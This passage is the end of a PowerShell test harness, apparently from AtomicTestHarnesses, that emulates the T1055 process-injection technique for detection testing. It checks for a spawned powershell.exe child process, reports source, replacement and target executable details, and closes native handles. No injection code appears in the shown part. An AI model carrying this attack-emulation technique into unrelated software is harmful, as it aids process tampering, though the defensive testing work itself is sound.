'ChildProcSpawned' -Timeout 10 $ChildProcInfo = $null if ($ChildProcSpawnedEvent) { $TestSuccess = $True $ChildProcInfo = $ChildProcSpawnedEvent.MessageData $SpawnedProcCommandLine = $ChildProcInfo.ProcessCommandLine $SpawnedProcProcessId = $ChildProcInfo.ProcessId $ChildProcSpawnedEvent | Remove-Event } else { Write-Error "powershell.exe child process was not spawned." } # Cleanup Unregister-Event -SourceIdentifier 'ProcessSpawned' } [PSCustomObject] @{ TechniqueID = 'T1055' TestSuccess = $TestSuccess TestGuid = $TestGuid ExecutionType = $ExecutionType SourceExecutableFilePath = $SourceExePath SourceExecutableFileHash = $SourceExeHash ReplacementExecutableFilePath = $ReplacementExePath ReplacementExecutableFileHash = $ReplacementExeHash TargetExecutablePath = $ResolvedTargetFilePath ProcessId = $ProcessID ProcessPath = $WMIProcessInfo.ExecutablePath ProcessCommandLine = $WMIProcessInfo.CommandLine ProcessModule = $ProcessMainModule ProcessMainThread = $ProcessMainThread ParentProcessId = $ParentProcID ParentProcessPath = $WMIParentProcessInfo.ExecutablePath ParentProcessCommandLine = $WMIParentProcessInfo.CommandLine ChildProcessId = $SpawnedProcProcessId ChildProcessCommandLine = $SpawnedProcCommandLine } # Cleanup $null = [AtomicTestHarnesses_T1055_UNK.ProcessNativeMethods]::NtClose($ThreadHandle) $null = [AtomicTestHarnesses_T1055_UNK.ProcessNativeMethods]::NtClose($ProcessHandle) $TargetFileStream.Close() } |